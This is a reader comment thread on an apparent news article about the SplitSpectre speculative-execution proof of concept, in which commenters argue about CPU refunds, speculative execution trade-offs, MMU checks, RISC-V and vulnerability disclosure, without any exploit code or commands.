There's only one thing to be sick about: these processors want to return home desperately and the press won’t let them!
You've patched your Intel, AMD, Power, and Arm gear to crush those pesky data-leaking speculative execution processor bugs, right? Good, because IBM eggheads in Switzerland have teamed up with Northeastern University boffins in the US to cook up Spectre exploit code they've dubbed SplitSpectre. SplitSpectre is a proof-of- …
I'm quite happy with my i7 6700, I do not want to return it.
I surf the web with NoScript and UBlock Origin, and I only go to places I know are reliable, so all this hullahoo leaves me stone cold.
In a few years, I'll probably have to change my equipment. By that time, whatever Spectre issues still exist will be corrected in silicon and I'll still get the performance I need.
So you never do technical research, looking at white papers, on-line shopping, use webmail services etc.
And you never, ever access a new site when it's been recommended by a friend / colleague?
I worked on a project some years ago where the new corporate web site design had been commissioned via a very trendy agency and hidden away on the credits page was a link to a hacker site. It turned out the agency had subcontracted the build work and the end contractor was a 'grey hat' he funded his lifestyle by doing web dev tasks but performed what he considered ethical hacking. I never did find out his view on the cooperation I was working for and as he had been engaged by the Marketing Department my efforts to get his code removed from the web site cane to nothing.
Any web site is only as secure as the last dev who performed an update or maintenance. Devs can be malicious players or ma just not have security at the fore when they are under pressure.
The problem with the refund option is what do you get in return?
Until new silicon is out there that fully addresses spectre, there's the possibility of a refund on the CPUs but
I'd point to the Pentium FDIV bug as the last time I can recall a serious issue that couldn't be addressed by a microcode patch - Intel fixed the issue and shipped new chips when sufficient volume to meet market requirements was available. The challenge this time is, aside from disabling hyperthreading, there's not much that can be done at the hardware level without building new memory management logic that likely buts a fix for this into 2020+ given typical 2-3 year development times.
Aside from that, if it's REALLY important, don't use virtualization or hyperthreading to try and minimise your exposure and if you can cope with the performance hits/your applications fully support the fixes, enable and test fixes as they are released.
Is this perfect? No. Can you provide an alternative workable solution for key business applications that already exist on vulnerable architectures while delivering required performance levels?
You say it yourself. It's broken. They chose to ignore the MMU in order to present faster systems.
Didn’t we have the same with the dear car manufacturers? They cheated on fuel efficiency and emissions, just so they could present themselves as much better than they are.
Either you get what you pay for or you get your money back. That’s rather simple. We’re not talking about bugs here! Intel is still shipping new silicon, while advertising their systems with benchmarks where they disable (=not enable) mitigations. That’s a deliberate deceit. How are you to compete with that as an honest puck?
Without being slapped on the wrist hard, Intel & Co. have no reason to change.
As a lot of you may be, I'm growing a bit tired of the dirty hacks pulled by chip vendors to make their stuff appear faster than it really is. Moore's law has lived, let it rest. Until we get really novel and interesting technologies working, the real improvement margin lies in getting back to elegant and optimized code, as opposed to the mad dash for ever-more lazy hacks-on-hacks layers that we are seeing today. As a rugby coach may say, "back to basics, team". Clean up your code, focus on efficiency, stop relying on hardware improvements to compensate for your sloppy code.
Of course I know I'm pissing reverse-windwards. Not a chance in hell that this will happen anytime soon, with the ever-increasing tendency to deliberately push buggy code -or hardware- into production as fast as possible. When "fail fast, recover faster" is an acceptable industry motto, you know you're screwed.
“You say it yourself. It's broken. They chose to ignore the MMU in order to present faster systems.”
The MMU isn’t broken though - it’s doing exactly what it was designed to do as it has no bits assigned to track CPU ring levels. The software fix to address spectre is a cache flush on context switch that causes a processor stall while the data is retrieved from main memory again at a cost of ~500 instruction cycles per core per context switch. Multiply that by hundreds or thousands of context switches per second and you have a significant performance issue.
“Didn’t we have the same with the dear car manufacturers? They cheated on fuel efficiency and emissions, just so they could present themselves as much better than they are.”
The difference is that the car manufacturers had to test their vehicles in a controlled manner - we don’t have equivalent tests for processors as depending on the workload, the number of context switches will vary significantly. While Spectre was predicted as being possible, it wasn’t demonstrated reliably until 2017 and as almost all CPUs providing any real level of performance used branch prediction by then, there was no magic fix. And no, I don’t consider the ARM processors that were unaffected as solutions - their bigger brothers intended for server workloads were affected because they use the standard methods for improving processor performance which are longer pipelines and branch prediction to avoid stalls...
If Intel and other manufacturers could give us an instant fix, I suspect they would have to avoid the publicity they have had around this and potentially give them breathing space while some of them resolved existing manufacturing issues...
"SplitSpectre is a proof-of-concept built from Speculator, the team's automated CPU bug-discovery tool, which the group plans to release as open-source software."
Thanks a bunch!
Can't you just run it and tell the CPU manufacturers what you have found?
How is this better than releasing viruses in the wild?
Is it better for you to have vulnerabilities that can be or are being exploited on equipment that cannot be software patched and may be in use on critical or sensitive equipment for many years and has been covered up by the CPU manufacturers or know about the vulnerabilities and allow yourself to look at mitigation to stop them being exploited - or at least know the risks?
From the article: "Spec-ex is one of the key drivers of processor speed"
No doubt this is true. It is also a major driver of transistor count and power consumption. Each lost speculation is wasted computation and if the CPU is always making a two way speculation it means 50 percent of the calculations are wasted electricity.
I am not a gamer. I use mainly office applications and do not need speed demons. I am far more interested in fanless operations and long battery lifetime. Why not offer chips with no speculative executions and instead use the saved transistor count for more cores and bigger caches? The question is not rhetorical, I just wonder why this is not made available.
RISC-V is said to be immune. Is that because they don't have speculative execution?
This is correct, of course. Things are a bit more complicated, however. Speculative execution can also lead to better cache usage, therefore saving energy (probably not nearly as much as is being blasted into wrong guesses).
The problem is not the speculative execution per se. It's rather the fact that they “choose to ignore a few things” for the sake of “performance”. It is idiotic to run the red lights during speculation, but so far they have gotten away with those rotten tricks.
Spec-Ex doesn't need to be costly, and the gains are almost always more than 50%. Why? Because most iterations last longer than that and therefore an iteration for even just 10 cycles with one spec-ex clash at the end is considerably faster than 10 cycles without spec-ex.
As noted elsewhere, one of the problems is due to sacrificing security for permance - as in only checking for access levels on presentation of the data rather than during the spec-ex fetch. While this seems reasonable the time difference between the two is noticeable and with caching allows the contents of the request to be derived. Slow, admittedly, but given the speed of modern processors not impossibly so.
So "office" applications or gaming, spec-ex markedly improves performance. Just in the case of Intel, in particular, it's a case of security vs performance.
RISC-V has spec-ex, however the spec-ex fetches go through the same MMU boundary checks as any other fetch. This doesn't that timing based differentials, and therefore data leaks, are impossible, just that they are considerably harder. A properly secure system would exhibit exactly the same outward performance regardless of a cache/security hit or not. Unfortunately that pretty much requires that spec-ex is disabled.
As a user, I now want all computing devices that I might puchase labelled to state whether or not they indulge in predictive execution - so I can avoid those that do.
OK, maybe my attitude is simplistic, but then whilst I understand the general idea of predictive execution, I don't understand the hows and ramifications and how the attacks on it work at all. But I do understand that KISS applies when considering the security of computer systems, and predictive execution clearly is NOT needed for consumer computing (as I gather that software work-arounds to ameliorate the problem slowed peoples PCs down a few percent). Maybe there's a place for it in high-level computing, but I'd happily sacrifice a little speed in return for a simpler CPU that I know has less of an attack surface.
Spec-ex is where the performance gains are. Why? Because OSes like windows and the applications that run on them aren't sufficiently parallel therefore serial processing speed has to be concentrated on even with the burden of context switching.
The difference between, for example, Intel Atom processors without spec-ex and Intel chips with spec-ex is quite phenomenal and a testament to the succes of the technique. Shame that Intel sacrificed security for performance so badly.
Non- x86 chips can also suffer from the same problems, it really depends on where the MMU boundary checks are applied. In Intel's case it's outside of the spec-ex, giving them a serious performance boost, compared to chips where the checks are applied within the spec-ex context. Technically, both are as valid as each other it's just that using timing tricks it's possible to derive data where the checks are applied outside of the spec-ex execution.
You seem to be caught up in the mistaken belief that all the world is trumpeting the security holes. Some vulnerabilities bring in thousands, others millions. The "investors" are anxious to keep their "investment" alive as long as possible. Secrecy is therefore part of the game.
Biting the hand that feeds IT © 1998–2020